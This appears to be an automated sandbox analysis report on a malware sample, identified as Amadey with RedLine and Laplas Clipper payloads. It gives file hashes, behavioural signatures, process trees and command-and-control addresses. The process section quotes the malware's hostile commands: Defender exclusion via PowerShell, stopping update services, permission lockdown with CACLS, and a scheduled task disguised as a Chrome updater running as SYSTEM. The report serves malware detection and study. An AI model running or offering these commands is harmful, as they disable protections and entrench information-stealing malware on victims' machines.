MD5 952626c44992eb05c992a211e4ca6cc0
SHA1 66bc05850f633d11ef1cc9f071ce79a99f4e0284
SHA256 5724ec4bf056aae4ad2221a8777f65dd0887c05f5a62e292788b657159508d0a
SHA512 32453a1233427be0fa05b7cbf6645893839458809345dc49e374ee722f1d74d30e99af30ab88363acb74bcefe5c624c69098dfc1c5b9afaef54ad4b9dc7235fa

memory/2124-147-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/2124-148-0x0000000000C10000-0x00000000013B9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 ede69e83b96e9bd7bbb4f4decd11e817
SHA1 1209597f9e6060b52a6e06ee95eec1c57257eeca
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA512 8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696

memory/1868-152-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/1868-155-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/1868-185-0x0000000000C10000-0x00000000013B9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 ede69e83b96e9bd7bbb4f4decd11e817
SHA1 1209597f9e6060b52a6e06ee95eec1c57257eeca
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA512 8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696

memory/2664-189-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/2664-192-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/2664-222-0x0000000000C10000-0x00000000013B9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 ede69e83b96e9bd7bbb4f4decd11e817
SHA1 1209597f9e6060b52a6e06ee95eec1c57257eeca
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA512 8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696

memory/896-226-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/896-229-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/896-259-0x0000000000C10000-0x00000000013B9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe

MD5 9b79f724b8ed77f9e3ce6a71b4cf909d
SHA1 455751b77ffb738d260c6388f191aa590c40eb50
SHA256 b95ae0c815dc8fc44d8c8bbde1e853b96c3e1389fb30bcdf1d68f8e6a74b3106
SHA512 0feb6c94b6c8fbceb8e63b0629e33d72c6080003203080b7d376a0bdf3f1a3a170bd19e1ce81ba284ea15d96414f57031361ac3dbbadf3c13090d86798906fad

\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe

MD5 9b79f724b8ed77f9e3ce6a71b4cf909d
SHA1 455751b77ffb738d260c6388f191aa590c40eb50
SHA256 b95ae0c815dc8fc44d8c8bbde1e853b96c3e1389fb30bcdf1d68f8e6a74b3106
SHA512 0feb6c94b6c8fbceb8e63b0629e33d72c6080003203080b7d376a0bdf3f1a3a170bd19e1ce81ba284ea15d96414f57031361ac3dbbadf3c13090d86798906fad

C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe

MD5 9b79f724b8ed77f9e3ce6a71b4cf909d
SHA1 455751b77ffb738d260c6388f191aa590c40eb50
SHA256 b95ae0c815dc8fc44d8c8bbde1e853b96c3e1389fb30bcdf1d68f8e6a74b3106
SHA512 0feb6c94b6c8fbceb8e63b0629e33d72c6080003203080b7d376a0bdf3f1a3a170bd19e1ce81ba284ea15d96414f57031361ac3dbbadf3c13090d86798906fad

memory/2124-273-0x0000000004510000-0x0000000004D7C000-memory.dmp

memory/2172-274-0x0000000000170000-0x00000000009DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

memory/2172-284-0x0000000077B60000-0x0000000077D09000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

memory/2124-289-0x0000000004620000-0x000000000555D000-memory.dmp

memory/2992-291-0x000000013FDD0000-0x0000000140D0D000-memory.dmp

memory/2124-294-0x0000000004510000-0x0000000004D7C000-memory.dmp

memory/2992-295-0x0000000077B60000-0x0000000077D09000-memory.dmp

memory/2172-306-0x0000000000170000-0x00000000009DC000-memory.dmp

memory/2172-307-0x0000000000170000-0x00000000009DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe

MD5 9b79f724b8ed77f9e3ce6a71b4cf909d
SHA1 455751b77ffb738d260c6388f191aa590c40eb50
SHA256 b95ae0c815dc8fc44d8c8bbde1e853b96c3e1389fb30bcdf1d68f8e6a74b3106
SHA512 0feb6c94b6c8fbceb8e63b0629e33d72c6080003203080b7d376a0bdf3f1a3a170bd19e1ce81ba284ea15d96414f57031361ac3dbbadf3c13090d86798906fad

memory/2172-312-0x0000000077B60000-0x0000000077D09000-memory.dmp

memory/2124-313-0x0000000004620000-0x000000000555D000-memory.dmp

memory/2992-314-0x000000013FDD0000-0x0000000140D0D000-memory.dmp

memory/2992-316-0x0000000077B60000-0x0000000077D09000-memory.dmp

\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 66dfc08fcb1e2503a5c51bdfb4ea275c
SHA1 a9e5db42a5493f8564c95bd216ea65b612533ade
SHA256 b838e571004ec023a187ad7dc93e812cea0cdd71e37007cf6dea3d9fddb0f766
SHA512 62d08602e22b9927c86cc3120fc7a381286ac3072d60b927b50341cea0300d19932266a54ca35819ad386028240a09271b27388d4fc0adabdf4047d2fa247636

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 94ecb633f5b61ff494e3d6f555bcab67
SHA1 299d1c33b6446be7007e3616910ae4ae0ffc0802
SHA256 c5239950dddab2e137bcaf55938f77927dec5b84d74ac5d3ebe47f63f23c1168
SHA512 6a6b843d340694050131f8147d7ad278197f4ec37ccf881625c184596fe5d8a88080d63d5aa1ae1f925ec9dc970373b4a2f1565b5f9c992d6b883805ef0341de

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 ede69e83b96e9bd7bbb4f4decd11e817
SHA1 1209597f9e6060b52a6e06ee95eec1c57257eeca
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA512 8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 36e1616ef6e5d51bb7a5af664d00d858
SHA1 56162501e6935e82c10b00f523b345c172f19f7c
SHA256 953011052287542fccbaa230a88321161d11dac2c736565d105059c5f83a0efd
SHA512 fc454a3636ae9a6ca9b7c4921ef62846fddb99cd92bd064fb1bf4c55725844765bf9bdf2fd11c04b4114423b2bcfc953362aed2477484eca8a3b4c40e36cc8da

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N6V6MSRQK8JQQ0XKMP73.temp

MD5 36e1616ef6e5d51bb7a5af664d00d858
SHA1 56162501e6935e82c10b00f523b345c172f19f7c
SHA256 953011052287542fccbaa230a88321161d11dac2c736565d105059c5f83a0efd
SHA512 fc454a3636ae9a6ca9b7c4921ef62846fddb99cd92bd064fb1bf4c55725844765bf9bdf2fd11c04b4114423b2bcfc953362aed2477484eca8a3b4c40e36cc8da

C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

\Program Files\Google\Chrome\updater.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

C:\Program Files\Google\Chrome\updater.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

C:\Windows\System32\drivers\etc\hosts

MD5 3e9af076957c5b2f9c9ce5ec994bea05
SHA1 a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256 e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-26 04:47

Reported

2023-07-26 04:52

Platform

win10-20230703-en

Max time kernel

235s

Max time network

289s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Laplas Clipper

stealer clipper laplas

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1100 created 3320 N/A C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe C:\Windows\Explorer.EXE

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Downloads MZ/PE file

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4175128012-676912335-1083716439-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4540 set thread context of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4048 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 4848 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 4848 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 4052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4136 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4136 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4136 wrote to memory of 4444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4848 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe
PID 4848 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe
PID 4848 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe
PID 4540 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4172 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe

"C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe

"C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe"

C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe

"C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe"

C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe

"C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe"

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

Network

Country Destination Domain Proto
NL 45.15.156.208:80 45.15.156.208 tcp
NL 45.15.156.208:80 45.15.156.208 tcp
US 8.8.8.8:53 second.amadgood.com udp
US 8.8.8.8:53 208.156.15.45.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 38.148.119.40.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 second.amadgood.com udp
NL 45.15.156.208:80 45.15.156.208 tcp
NL 194.180.49.153:80 194.180.49.153 tcp
US 8.8.8.8:53 153.49.180.194.in-addr.arpa udp
SG 128.199.192.86:81 tcp
US 8.8.8.8:53 86.192.199.128.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
US 206.189.229.43:80 206.189.229.43 tcp
US 8.8.8.8:53 172.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 43.229.189.206.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 ede69e83b96e9bd7bbb4f4decd11e817
SHA1 1209597f9e6060b52a6e06ee95eec1c57257eeca
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA512 8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696

C:\Users\Admin\AppData\Local\Temp\175128012676

MD5 0c3d88ba607e98f1c1138d8bc8f222d6
SHA1 a44478a23d4bb07e50953a5f331edcf177f450a5
SHA256 aae41c62fb3b7d95679b9b11cae4c54d9acc71a0ec581aac718d2262cb3fbea2
SHA512 e0f81401d30c73d0388cf34ca52d2b9dfe1164c2b81eab6424c0c2ec9268e03caea42c90981ee9df7003463991baf20a6fcb598fbacceea41b95f16a025b45e2

C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe

MD5 f4418fda299a31dc7ebb1fd709ad1cbd
SHA1 6f134f821f49572b5e306ee34b60a7af0681a0f1
SHA256 ea8406ed0469799ed23d66d2f759aace9eeb460432d6a62b64e35ca8cb285c86
SHA512 f72ab5a99a98d0c44fb0a001e47d8e6645d22a78bf34638a8efe82ba07474ffd3d412982743022bf1370e721379822c0b4e39fa857dff95b4a1af98ebd3797bd

C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe

MD5 9b79f724b8ed77f9e3ce6a71b4cf909d
SHA1 455751b77ffb738d260c6388f191aa590c40eb50
SHA256 b95ae0c815dc8fc44d8c8bbde1e853b96c3e1389fb30bcdf1d68f8e6a74b3106
SHA512 0feb6c94b6c8fbceb8e63b0629e33d72c6080003203080b7d376a0bdf3f1a3a170bd19e1ce81ba284ea15d96414f57031361ac3dbbadf3c13090d86798906fad

C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 9a2467b987f133374c14d5478388a77f
SHA1 4defa452b2bd98312d128e1b0e6e8acd7792ce40
SHA256 2778f3c03eb91510b6d8b96de11730bf9507a5d78678e273325083f99ce7fe03
SHA512 ecdc65d9c1883b7c7a3424195986699d99f2c0d3bf5a9b1f0e3fe0bfb1932a6051994618f72a5ad6e66ae7270e0375d8c297b4d87e258365c605e34d05ca2b48

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 a9ba7e8ec155eb550249d2840f2c0669
SHA1 7348bf6ad0d96bd0f158da6d88c24d14ab7f46e6
SHA256 8311a2650f9e16c30ee01b88dea9901fee48914cc5f21c82ca3027fbf08681dc
SHA512 07f1f848addab0aa6cb9eeb2adba9e124b47c35b8404adaeb61fe6abdbfc1d731250868c5578a7e6995ac6cc9ec631d7af43aa17dfb52ac453007a7e46bfda5c

memory/376-292-0x00000000002A0000-0x0000000000B0C000-memory.dmp

memory/4172-294-0x0000000001350000-0x0000000001BBC000-memory.dmp

memory/4172-295-0x00007FFB8A7C0000-0x00007FFB8A99B000-memory.dmp

memory/5028-298-0x0000000072AE0000-0x00000000731CE000-memory.dmp

memory/376-300-0x00007FFB8A7C0000-0x00007FFB8A99B000-memory.dmp

memory/1700-307-0x00007FFB7CDC0000-0x00007FFB7D7AC000-memory.dmp

memory/1700-311-0x0000025CE90E0000-0x0000025CE90F0000-memory.dmp

memory/1700-313-0x0000025CE90E0000-0x0000025CE90F0000-memory.dmp

memory/5028-314-0x0000000007470000-0x0000000007480000-memory.dmp

memory/376-318-0x00000000002A0000-0x0000000000B0C000-memory.dmp

memory/1700-317-0x0000025CE9120000-0x0000025CE9142000-memory.dmp

memory/1700-321-0x0000025CE9340000-0x0000025CE93B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rjcayeg3.j3j.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1700-334-0x0000025CE90E0000-0x0000025CE90F0000-memory.dmp

memory/376-353-0x00000000002A0000-0x0000000000B0C000-memory.dmp

memory/5028-356-0x0000000009180000-0x00000000091F6000-memory.dmp

memory/5028-360-0x0000000004E60000-0x0000000004E7E000-memory.dmp

memory/376-362-0x00007FFB8A7C0000-0x00007FFB8A99B000-memory.dmp

memory/5028-363-0x0000000009FB0000-0x000000000A172000-memory.dmp

memory/1700-364-0x00007FFB7CDC0000-0x00007FFB7D7AC000-memory.dmp

memory/5028-367-0x000000000A6B0000-0x000000000ABDC000-memory.dmp

memory/1700-368-0x0000025CE90E0000-0x0000025CE90F0000-memory.dmp

memory/1700-369-0x0000025CE90E0000-0x0000025CE90F0000-memory.dmp

memory/1700-372-0x00007FFB7CDC0000-0x00007FFB7D7AC000-memory.dmp

